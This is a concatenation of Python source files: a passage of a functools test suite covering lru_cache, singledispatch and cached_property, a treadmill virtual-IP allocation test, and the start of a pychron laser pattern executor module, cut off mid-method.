self.assertEqual(a.f.cache_info(), X.f.cache_info())
self.assertEqual(b.f.cache_info(), X.f.cache_info())
self.assertEqual(c.f.cache_info(), X.f.cache_info())
def test_pickle(self):
cls = self.__class__
for f in cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth:
for proto in range(pickle.HIGHEST_PROTOCOL + 1):
with self.subTest(proto=proto, func=f):
f_copy = pickle.loads(pickle.dumps(f, proto))
self.assertIs(f_copy, f)
def test_copy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.copy(f)
self.assertIs(f_copy, f)
def test_deepcopy(self):
cls = self.__class__
def orig(x, y):
return 3 * x + y
part = self.module.partial(orig, 2)
funcs = (cls.cached_func[0], cls.cached_meth, cls.cached_staticmeth,
self.module.lru_cache(2)(part))
for f in funcs:
with self.subTest(func=f):
f_copy = copy.deepcopy(f)
self.assertIs(f_copy, f)
@py_functools.lru_cache()
def py_cached_func(x, y):
return 3 * x + y
@c_functools.lru_cache()
def c_cached_func(x, y):
return 3 * x + y
class TestLRUPy(TestLRU, unittest.TestCase):
module = py_functools
cached_func = py_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestLRUC(TestLRU, unittest.TestCase):
module = c_functools
cached_func = c_cached_func,
@module.lru_cache()
def cached_meth(self, x, y):
return 3 * x + y
@staticmethod
@module.lru_cache()
def cached_staticmeth(x, y):
return 3 * x + y
class TestSingleDispatch(unittest.TestCase):
def test_simple_overloads(self):
@functools.singledispatch
def g(obj):
return "base"
def g_int(i):
return "integer"
g.register(int, g_int)
self.assertEqual(g("str"), "base")
self.assertEqual(g(1), "integer")
self.assertEqual(g([1,2,3]), "base")
def test_mro(self):
@functools.singledispatch
def g(obj):
return "base"
class A:
pass
class C(A):
pass
class B(A):
pass
class D(C, B):
pass
def g_A(a):
return "A"
def g_B(b):
return "B"
g.register(A, g_A)
g.register(B, g_B)
self.assertEqual(g(A()), "A")
self.assertEqual(g(B()), "B")
self.assertEqual(g(C()), "A")
self.assertEqual(g(D()), "B")
def test_register_decorator(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(int)
def g_int(i):
return "int %s" % (i,)
self.assertEqual(g(""), "base")
self.assertEqual(g(12), "int 12")
self.assertIs(g.dispatch(int), g_int)
self.assertIs(g.dispatch(object), g.dispatch(str))
# Note: in the assert above this is not g.
# @singledispatch returns the wrapper.
def test_wrapping_attributes(self):
@functools.singledispatch
def g(obj):
"Simple test"
return "Test"
self.assertEqual(g.__name__, "g")
if sys.flags.optimize < 2:
self.assertEqual(g.__doc__, "Simple test")
@unittest.skipUnless(decimal, 'requires _decimal')
@support.cpython_only
def test_c_classes(self):
@functools.singledispatch
def g(obj):
return "base"
@g.register(decimal.DecimalException)
def _(obj):
return obj.args
subn = decimal.Subnormal("Exponent < Emin")
rnd = decimal.Rounded("Number got rounded")
self.assertEqual(g(subn), ("Exponent < Emin",))
self.assertEqual(g(rnd), ("Number got rounded",))
@g.register(decimal.Subnormal)
def _(obj):
return "Too small to care."
self.assertEqual(g(subn), "Too small to care.")
self.assertEqual(g(rnd), ("Number got rounded",))
def test_compose_mro(self):
# None of the examples in this test depend on haystack ordering.
c = collections.abc
mro = functools._compose_mro
bases = [c.Sequence, c.MutableMapping, c.Mapping, c.Set]
for haystack in permutations(bases):
m = mro(dict, haystack)
self.assertEqual(m, [dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
bases = [c.Container, c.Mapping, c.MutableMapping, collections.OrderedDict]
for haystack in permutations(bases):
m = mro(collections.ChainMap, haystack)
self.assertEqual(m, [collections.ChainMap, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
# If there's a generic function with implementations registered for
# both Sized and Container, passing a defaultdict to it results in an
# ambiguous dispatch which will cause a RuntimeError (see
# test_mro_conflicts).
bases = [c.Container, c.Sized, str]
for haystack in permutations(bases):
m = mro(collections.defaultdict, [c.Sized, c.Container, str])
self.assertEqual(m, [collections.defaultdict, dict, c.Sized,
c.Container, object])
# MutableSequence below is registered directly on D. In other words, it
# precedes MutableMapping which means single dispatch will always
# choose MutableSequence here.
class D(collections.defaultdict):
pass
c.MutableSequence.register(D)
bases = [c.MutableSequence, c.MutableMapping]
for haystack in permutations(bases):
m = mro(D, bases)
self.assertEqual(m, [D, c.MutableSequence, c.Sequence, c.Reversible,
collections.defaultdict, dict, c.MutableMapping, c.Mapping,
c.Collection, c.Sized, c.Iterable, c.Container,
object])
# Container and Callable are registered on different base classes and
# a generic function supporting both should always pick the Callable
# implementation if a C instance is passed.
class C(collections.defaultdict):
def __call__(self):
pass
bases = [c.Sized, c.Callable, c.Container, c.Mapping]
for haystack in permutations(bases):
m = mro(C, haystack)
self.assertEqual(m, [C, c.Callable, collections.defaultdict, dict, c.Mapping,
c.Collection, c.Sized, c.Iterable,
c.Container, object])
def test_register_abc(self):
c = collections.abc
d = {"a": "b"}
l = [1, 2, 3]
s = {object(), None}
f = frozenset(s)
t = (1, 2, 3)
@functools.singledispatch
def g(obj):
return "base"
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "base")
self.assertEqual(g(s), "base")
self.assertEqual(g(f), "base")
self.assertEqual(g(t), "base")
g.register(c.Sized, lambda obj: "sized")
self.assertEqual(g(d), "sized")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableMapping, lambda obj: "mutablemapping")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(collections.ChainMap, lambda obj: "chainmap")
self.assertEqual(g(d), "mutablemapping") # irrelevant ABCs registered
self.assertEqual(g(l), "sized")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSequence, lambda obj: "mutablesequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "sized")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.MutableSet, lambda obj: "mutableset")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Mapping, lambda obj: "mapping")
self.assertEqual(g(d), "mutablemapping") # not specific enough
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sized")
g.register(c.Sequence, lambda obj: "sequence")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "sized")
self.assertEqual(g(t), "sequence")
g.register(c.Set, lambda obj: "set")
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(dict, lambda obj: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "mutablesequence")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(list, lambda obj: "list")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "mutableset")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(set, lambda obj: "concrete-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "set")
self.assertEqual(g(t), "sequence")
g.register(frozenset, lambda obj: "frozen-set")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "sequence")
g.register(tuple, lambda obj: "tuple")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
self.assertEqual(g(s), "concrete-set")
self.assertEqual(g(f), "frozen-set")
self.assertEqual(g(t), "tuple")
def test_c3_abc(self):
c = collections.abc
mro = functools._c3_mro
class A(object):
pass
class B(A):
def __len__(self):
return 0 # implies Sized
@c.Container.register
class C(object):
pass
class D(object):
pass # unrelated
class X(D, C, B):
def __call__(self):
pass # implies Callable
expected = [X, c.Callable, D, C, c.Container, B, c.Sized, A, object]
for abcs in permutations([c.Sized, c.Callable, c.Container]):
self.assertEqual(mro(X, abcs=abcs), expected)
# unrelated ABCs don't appear in the resulting MRO
many_abcs = [c.Mapping, c.Sized, c.Callable, c.Container, c.Iterable]
self.assertEqual(mro(X, abcs=many_abcs), expected)
def test_false_meta(self):
# see issue23572
class MetaA(type):
def __len__(self):
return 0
class A(metaclass=MetaA):
pass
class AA(A):
pass
@functools.singledispatch
def fun(a):
return 'base A'
@fun.register(A)
def _(a):
return 'fun A'
aa = AA()
self.assertEqual(fun(aa), 'fun A')
def test_mro_conflicts(self):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
class O(c.Sized):
def __len__(self):
return 0
o = O()
self.assertEqual(g(o), "base")
g.register(c.Iterable, lambda arg: "iterable")
g.register(c.Container, lambda arg: "container")
g.register(c.Sized, lambda arg: "sized")
g.register(c.Set, lambda arg: "set")
self.assertEqual(g(o), "sized")
c.Iterable.register(O)
self.assertEqual(g(o), "sized") # because it's explicitly in __mro__
c.Container.register(O)
self.assertEqual(g(o), "sized") # see above: Sized is in __mro__
c.Set.register(O)
self.assertEqual(g(o), "set") # because c.Set is a subclass of
# c.Sized and c.Container
class P:
pass
p = P()
self.assertEqual(g(p), "base")
c.Iterable.register(P)
self.assertEqual(g(p), "iterable")
c.Container.register(P)
with self.assertRaises(RuntimeError) as re_one:
g(p)
self.assertIn(
str(re_one.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Iterable'>"),
("Ambiguous dispatch: <class 'collections.abc.Iterable'> "
"or <class 'collections.abc.Container'>")),
)
class Q(c.Sized):
def __len__(self):
return 0
q = Q()
self.assertEqual(g(q), "sized")
c.Iterable.register(Q)
self.assertEqual(g(q), "sized") # because it's explicitly in __mro__
c.Set.register(Q)
self.assertEqual(g(q), "set") # because c.Set is a subclass of
# c.Sized and c.Iterable
@functools.singledispatch
def h(arg):
return "base"
@h.register(c.Sized)
def _(arg):
return "sized"
@h.register(c.Container)
def _(arg):
return "container"
# Even though Sized and Container are explicit bases of MutableMapping,
# this ABC is implicitly registered on defaultdict which makes all of
# MutableMapping's bases implicit as well from defaultdict's
# perspective.
with self.assertRaises(RuntimeError) as re_two:
h(collections.defaultdict(lambda: 0))
self.assertIn(
str(re_two.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class R(collections.defaultdict):
pass
c.MutableSequence.register(R)
@functools.singledispatch
def i(arg):
return "base"
@i.register(c.MutableMapping)
def _(arg):
return "mapping"
@i.register(c.MutableSequence)
def _(arg):
return "sequence"
r = R()
self.assertEqual(i(r), "sequence")
class S:
pass
class T(S, c.Sized):
def __len__(self):
return 0
t = T()
self.assertEqual(h(t), "sized")
c.Container.register(T)
self.assertEqual(h(t), "sized") # because it's explicitly in the MRO
class U:
def __len__(self):
return 0
u = U()
self.assertEqual(h(u), "sized") # implicit Sized subclass inferred
# from the existence of __len__()
c.Container.register(U)
# There is no preference for registered versus inferred ABCs.
with self.assertRaises(RuntimeError) as re_three:
h(u)
self.assertIn(
str(re_three.exception),
(("Ambiguous dispatch: <class 'collections.abc.Container'> "
"or <class 'collections.abc.Sized'>"),
("Ambiguous dispatch: <class 'collections.abc.Sized'> "
"or <class 'collections.abc.Container'>")),
)
class V(c.Sized, S):
def __len__(self):
return 0
@functools.singledispatch
def j(arg):
return "base"
@j.register(S)
def _(arg):
return "s"
@j.register(c.Container)
def _(arg):
return "container"
v = V()
self.assertEqual(j(v), "s")
c.Container.register(V)
self.assertEqual(j(v), "container") # because it ends up right after
# Sized in the MRO
def test_cache_invalidation(self):
from collections import UserDict
import weakref
class TracingDict(UserDict):
def __init__(self, *args, **kwargs):
super(TracingDict, self).__init__(*args, **kwargs)
self.set_ops = []
self.get_ops = []
def __getitem__(self, key):
result = self.data[key]
self.get_ops.append(key)
return result
def __setitem__(self, key, value):
self.set_ops.append(key)
self.data[key] = value
def clear(self):
self.data.clear()
td = TracingDict()
with support.swap_attr(weakref, "WeakKeyDictionary", lambda: td):
c = collections.abc
@functools.singledispatch
def g(arg):
return "base"
d = {}
l = []
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(g(l), "base")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [])
self.assertEqual(td.set_ops, [dict, list])
self.assertEqual(td.data[dict], g.registry[object])
self.assertEqual(td.data[list], g.registry[object])
self.assertEqual(td.data[dict], td.data[list])
self.assertEqual(g(l), "base")
self.assertEqual(g(d), "base")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list])
g.register(list, lambda arg: "list")
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "base")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict])
self.assertEqual(td.data[dict],
functools._find_impl(dict, g.registry))
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list])
self.assertEqual(td.data[list],
functools._find_impl(list, g.registry))
class X:
pass
c.MutableMapping.register(X) # Will not invalidate the cache,
# not using ABCs yet.
self.assertEqual(g(d), "base")
self.assertEqual(g(l), "list")
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list])
g.register(c.Sized, lambda arg: "sized")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "sized")
self.assertEqual(len(td), 1)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict])
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
self.assertEqual(td.get_ops, [list, dict, dict, list])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
self.assertEqual(g(l), "list")
self.assertEqual(g(d), "sized")
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
g.dispatch(list)
g.dispatch(dict)
self.assertEqual(td.get_ops, [list, dict, dict, list, list, dict,
list, dict])
self.assertEqual(td.set_ops, [dict, list, dict, list, dict, list])
c.MutableSet.register(X) # Will invalidate the cache.
self.assertEqual(len(td), 2) # Stale cache.
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 1)
g.register(c.MutableMapping, lambda arg: "mutablemapping")
self.assertEqual(len(td), 0)
self.assertEqual(g(d), "mutablemapping")
self.assertEqual(len(td), 1)
self.assertEqual(g(l), "list")
self.assertEqual(len(td), 2)
g.register(dict, lambda arg: "dict")
self.assertEqual(g(d), "dict")
self.assertEqual(g(l), "list")
g._clear_cache()
self.assertEqual(len(td), 0)
def test_annotations(self):
@functools.singledispatch
def i(arg):
return "base"
@i.register
def _(arg: collections.abc.Mapping):
return "mapping"
@i.register
def _(arg: "collections.abc.Sequence"):
return "sequence"
self.assertEqual(i(None), "base")
self.assertEqual(i({"a": 1}), "mapping")
self.assertEqual(i([1, 2, 3]), "sequence")
self.assertEqual(i((1, 2, 3)), "sequence")
self.assertEqual(i("str"), "sequence")
# Registering classes as callables doesn't work with annotations,
# you need to pass the type explicitly.
@i.register(str)
class _:
def __init__(self, arg):
self.arg = arg
def __eq__(self, other):
return self.arg == other
self.assertEqual(i("str"), "str")
def test_method_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
self.arg = "base"
@t.register(int)
def _(self, arg):
self.arg = "int"
@t.register(str)
def _(self, arg):
self.arg = "str"
a = A()
a.t(0)
self.assertEqual(a.arg, "int")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t('')
self.assertEqual(a.arg, "str")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
a.t(0.0)
self.assertEqual(a.arg, "base")
aa = A()
self.assertFalse(hasattr(aa, 'arg'))
def test_staticmethod_register(self):
class A:
@functools.singledispatchmethod
@staticmethod
def t(arg):
return arg
@t.register(int)
@staticmethod
def _(arg):
return isinstance(arg, int)
@t.register(str)
@staticmethod
def _(arg):
return isinstance(arg, str)
a = A()
self.assertTrue(A.t(0))
self.assertTrue(A.t(''))
self.assertEqual(A.t(0.0), 0.0)
def test_classmethod_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_callable_register(self):
class A:
def __init__(self, arg):
self.arg = arg
@functools.singledispatchmethod
@classmethod
def t(cls, arg):
return cls("base")
@A.t.register(int)
@classmethod
def _(cls, arg):
return cls("int")
@A.t.register(str)
@classmethod
def _(cls, arg):
return cls("str")
self.assertEqual(A.t(0).arg, "int")
self.assertEqual(A.t('').arg, "str")
self.assertEqual(A.t(0.0).arg, "base")
def test_abstractmethod_register(self):
class Abstract(abc.ABCMeta):
@functools.singledispatchmethod
@abc.abstractmethod
def add(self, x, y):
pass
self.assertTrue(Abstract.add.__isabstractmethod__)
def test_type_ann_register(self):
class A:
@functools.singledispatchmethod
def t(self, arg):
return "base"
@t.register
def _(self, arg: int):
return "int"
@t.register
def _(self, arg: str):
return "str"
a = A()
self.assertEqual(a.t(0), "int")
self.assertEqual(a.t(''), "str")
self.assertEqual(a.t(0.0), "base")
def test_invalid_registrations(self):
msg_prefix = "Invalid first argument to `register()`: "
msg_suffix = (
". Use either `@register(some_class)` or plain `@register` on an "
"annotated function."
)
@functools.singledispatch
def i(arg):
return "base"
with self.assertRaises(TypeError) as exc:
@i.register(42)
def _(arg):
return "I annotated with a non-type"
self.assertTrue(str(exc.exception).startswith(msg_prefix + "42"))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg):
return "I forgot to annotate"
self.assertTrue(str(exc.exception).startswith(msg_prefix +
"<function TestSingleDispatch.test_invalid_registrations.<locals>._"
))
self.assertTrue(str(exc.exception).endswith(msg_suffix))
with self.assertRaises(TypeError) as exc:
@i.register
def _(arg: typing.Iterable[str]):
# At runtime, dispatching on generics is impossible.
# When registering implementations with singledispatch, avoid
# types from `typing`. Instead, annotate with regular types
# or ABCs.
return "I annotated with a generic collection"
self.assertTrue(str(exc.exception).startswith(
"Invalid annotation for 'arg'."
))
self.assertTrue(str(exc.exception).endswith(
'typing.Iterable[str] is not a class.'
))
def test_invalid_positional_argument(self):
@functools.singledispatch
def f(*args):
pass
msg = 'f requires at least 1 positional argument'
with self.assertRaisesRegex(TypeError, msg):
f()
class CachedCostItem:
_cost = 1
def __init__(self):
self.lock = py_functools.RLock()
@py_functools.cached_property
def cost(self):
"""The cost of the item."""
with self.lock:
self._cost += 1
return self._cost
class OptionallyCachedCostItem:
_cost = 1
def get_cost(self):
"""The cost of the item."""
self._cost += 1
return self._cost
cached_cost = py_functools.cached_property(get_cost)
class CachedCostItemWait:
def __init__(self, event):
self._cost = 1
self.lock = py_functools.RLock()
self.event = event
@py_functools.cached_property
def cost(self):
self.event.wait(1)
with self.lock:
self._cost += 1
return self._cost
class CachedCostItemWithSlots:
__slots__ = ('_cost')
def __init__(self):
self._cost = 1
@py_functools.cached_property
def cost(self):
raise RuntimeError('never called, slots not supported')
class TestCachedProperty(unittest.TestCase):
def test_cached(self):
item = CachedCostItem()
self.assertEqual(item.cost, 2)
self.assertEqual(item.cost, 2) # not 3
def test_cached_attribute_name_differs_from_func_name(self):
item = OptionallyCachedCostItem()
self.assertEqual(item.get_cost(), 2)
self.assertEqual(item.cached_cost, 3)
self.assertEqual(item.get_cost(), 4)
self.assertEqual(item.cached_cost, 3)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_threaded(self):
go = threading.Event()
item = CachedCostItemWait(go)
num_threads = 3
orig_si = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
threads = [
threading.Thread(target=lambda: item.cost)
for k in range(num_threads)
]
with support.start_threads(threads):
go.set()
finally:
sys.setswitchinterval(orig_si)
self.assertEqual(item.cost, 2)
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_object_with_slots(self):
item = CachedCostItemWithSlots()
with self.assertRaisesRegex(
TypeError,
"No '__dict__' attribute on 'CachedCostItemWithSlots' instance to cache 'cost' property.",
):
item.cost
def test_immutable_dict(self):
class MyMeta(type):
@py_functools.cached_property
def prop(self):
return True
class MyClass(metaclass=MyMeta):
pass
with self.assertRaisesRegex(
TypeError,
"The '__dict__' attribute on 'MyMeta' instance does not support item assignment for caching 'prop' property.",
):
MyClass.prop
# TODO: RUSTPYTHON
@unittest.expectedFailure
def test_reuse_different_names(self):
"""Disallow this case because decorated function a would not be cached."""
with self.assertRaises(RuntimeError) as ctx:
class ReusedCachedProperty:
@py_functools.cached_property
def a(self):
pass
b = a
self.assertEqual(
str(ctx.exception.__context__),
str(TypeError("Cannot assign the same cached_property to two different names ('a' and 'b')."))
)
def test_reuse_same_name(self):
"""Reusing a cached_property on different classes under the same name is OK."""
counter = 0
@py_functools.cached_property
def _cp(_self):
nonlocal counter
counter += 1
return counter
class A:
cp = _cp
class B:
cp = _cp
a = A()
b = B()
self.assertEqual(a.cp, 1)
self.assertEqual(b.cp, 2)
self.assertEqual(a.cp, 1)
def test_set_name_not_called(self):
cp = py_functools.cached_property(lambda s: None)
class Foo:
pass
Foo.cp = cp
with self.assertRaisesRegex(
TypeError,
"Cannot use cached_property instance without calling __set_name__ on it.",
):
Foo().cp
def test_access_from_class(self):
self.assertIsInstance(CachedCostItem.cost, py_functools.cached_property)
def test_doc(self):
self.assertEqual(CachedCostItem.cost.__doc__, "The cost of the item.")
if __name__ == '__main__':
unittest.main()
|
vipfile_test.py
|
"""Unit test for vipfile - rule manager.
"""
import os
import shutil
import tempfile
import threading
import unittest
from treadmill import vipfile
class VipFileTest(unittest.TestCase):
"""Tests for teadmill.rulefile."""
def setUp(self):
self.root = tempfile.mkdtemp()
self.vips_dir = os.path.join(self.root, 'vips')
owner_dirs = os.path.join(self.root, 'owners')
os.mkdir(owner_dirs)
for owner in range(0, 15):
with open(os.path.join(owner_dirs, str(owner)), 'w'):
pass
self.vips = vipfile.VipMgr(self.vips_dir, owner_dirs)
def tearDown(self):
if self.root and os.path.isdir(self.root):
shutil.rmtree(self.root)
def test_alloc(self):
"""Verifies that vips are allocated atomically with no duplicates."""
vips = set()
def alloc_thread(idx):
"""Allocate container ip."""
ip0 = self.vips.alloc(str(idx))
vips.add(ip0)
threads = []
for i in range(0, 15):
threads.append(threading.Thread(target=alloc_thread, args=(i,)))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
self.assertEqual(len(threads), len(vips))
def test_free(self):
"""Tests freeing the resource."""
owner = '3'
ip0 = self.vips.alloc(owner)
self.assertTrue(os.path.exists(os.path.join(self.vips_dir, ip0)))
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
# Calling free twice is noop.
self.vips.free(owner, ip0)
self.assertFalse(os.path.exists(os.path.join(self.vips_dir, ip0)))
if __name__ == '__main__':
unittest.main()
|
pattern_executor.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
import os
import time
from threading import Event
from io import StringIO
from numpy import polyfit, array, average, uint8, zeros_like
from skimage.color import gray2rgb
from skimage.draw import circle
from traits.api import Any, Bool
from pychron.core.ui.gui import invoke_in_main_thread
from pychron.core.ui.thread import Thread, sleep
from pychron.envisage.view_util import open_view
from pychron.hardware.motion_controller import PositionError, TargetPositionError
from pychron.lasers.pattern.patternable import Patternable
from pychron.paths import paths
from pychron.pychron_constants import NULL_STR
class PatternExecutor(Patternable):
"""
a pattern is only good for one execution.
self.pattern needs to be reset after stop or finish using load_pattern(name_or_pickle)
"""
controller = Any
laser_manager = Any
show_patterning = Bool(False)
_alive = Bool(False)
def __init__(self, *args, **kw):
super(PatternExecutor, self).__init__(*args, **kw)
self._next_point = None
self.pattern = None
self._xy_thread = None
self._power_thread = None
self._z_thread = None
def start(self, show=False):
self._alive = True
if show:
self.show_pattern()
if self.pattern:
self.pattern.clear_graph()
def finish(self):
self._alive = False
self.close_pattern()
self.pattern = None
def set_stage_values(self, sm):
if self.pattern:
self.pattern.set_stage_values(sm)
def set_current_position(self, x, y, z):
if self.isPatterning():
graph = self.pattern.graph
graph.set_data([x], series=1, axis=0)
graph.set_data([y], series=1, axis=1)
graph.add_datum((x, y), series=2)
graph.redraw()
def load_pattern(self, name_or_pickle):
"""
look for name_or_pickle in local pattern dir
if not found try interpreting name_or_pickle is a pickled name_or_pickle
"""
if name_or_pickle is None:
path = self.open_file_dialog()
if path is None:
return
else:
path = self.is_local_pattern(name_or_pickle)
if path:
wfile = open(path, 'rb')
else:
# convert name_or_pickle into a file like obj
wfile = StringIO(name_or_pickle)
# self._load_pattern sets self.pattern
pattern = self._load_pattern(wfile, path)
self.on_trait_change(self.stop, 'canceled')
return pattern
def is_local_pattern(self, name):
def test_name(ni):
path = os.path.join(paths.pattern_dir, ni)
if os.path.isfile(path):
return path
for ni in (name, name + '.lp'):
p = test_name(ni)
if p:
return p
def stop(self):
self._alive = False
if self.controller:
self.info('User requested stop')
self.controller.stop()
if self.pattern is not None:
if self.controller:
self.controller.linear_move(self.pattern.cx, self.pattern.cy, source='pattern stop')
# self.pattern.close_ui()
self.info('Pattern {} stopped'.format(self.pattern_name))
# prevent future stops (AbortJogs from massspec) from executing
self.pattern = None
def isPatterning(self):
return self._alive
def close_pattern(self):
pass
def show_pattern(self):
self.pattern.window_x = 50
self.pattern.window_y = 50
open_view(self.pattern, view='graph_view')
def execute(self, block=False, duration=None, thread_safe=True):
"""
if block is true wait for patterning to finish
before returning
"""
if not self.pattern:
return
self.start(show=self.show_patterning)
evt = None
# if current_thread().name != 'MainThread':
if thread_safe:
evt = Event()
invoke_in_main_thread(self._pre_execute, evt)
while not evt.is_set():
time.sleep(0.05)
else:
self._pre_execute(evt)
self.debug('execute xy pattern')
xyp = self.pattern.xy_pattern_enabled
if duration:
self.pattern.external_duration = float(duration)
if xyp:
self._xy_thread = Thread(target=self._execute_xy_pattern)
self._xy_thread.start()
pp = self.pattern.power_pattern
if pp:
self.debug('execute power pattern')
self._power_thread = Thread(target=self._execute_power_pattern)
self._power_thread.start()
zp = self.pattern.z_pattern
if zp:
self.debug('execute z pattern')
self._z_thread = Thread(target=self._execute_z_pattern)
self._z_thread.start()
if block:
if self._xy_thread:
self._xy_thread.join()
if self._z_thread:
self._z_thread.join()
if self._power_thread:
self._power_thread.join()
self.finish()
def _pre_execute(self, evt):
self.debug('pre execute')
pattern = self.pattern
kind = pattern.kind
if kind in ('SeekPattern', 'DragonFlyPeakPattern'):
self._info = open_view(pattern, view='execution_graph_view')
if evt is not None:
evt.set()
self.debug('pre execute finished')
def _execute_power_pattern(self):
pat = self.pattern
self.info('starting power pattern {}'.format(pat.name))
def func(v):
self.laser_manager.set_laser_power(v)
self._execute_(func, pat.power_values(), pat.power_sample, 'power pattern setpoint={value}')
def _execute_z_pattern(self):
pat = self.pattern
self.info('starting power pattern {}'.format(pat.name))
def func(v):
self.controller.set_z(v)
self._execute_(func, pat.z_values(), pat.z_sample, 'z pattern z={value}')
def _execute_(self, func, vs, period, msg):
for v in vs:
st = time.time()
self.debug(msg.format(value=v))
func(v)
et = st - time.time()
p = period - et
time.sleep(p)
def _execute_xy_pattern(self):
pat = self.pattern
self.info('starting pattern {}'.format(pat.name))
st = time.time()
self.controller.update_position()
time.sleep(1)
pat.cx, pat.cy = self.controller.x, self.controller.y
try:
for ni in range(pat.niterations):
if not self.isPatterning():
break
self.info('doing pattern iteration {}'.format(ni))
self._execute_iteration()
self.controller.linear_move(pat.cx, pat.cy, block=True, source='execute_xy_pattern')
if pat.disable_at_end:
self.laser_manager.disable_device()
self.finish()
self.info('finished pattern: transit time={:0.1f}s'.format(time.time() - st))
except (TargetPositionError, PositionError) as e:
self.finish()
self.controller.stop()
self.laser_manager.emergency_shutoff(str(e))
def _execute_iteration(self):
controller = self.controller
pattern = self.pattern
if controller is not None:
kind = pattern.kind
if kind == 'ArcPattern':
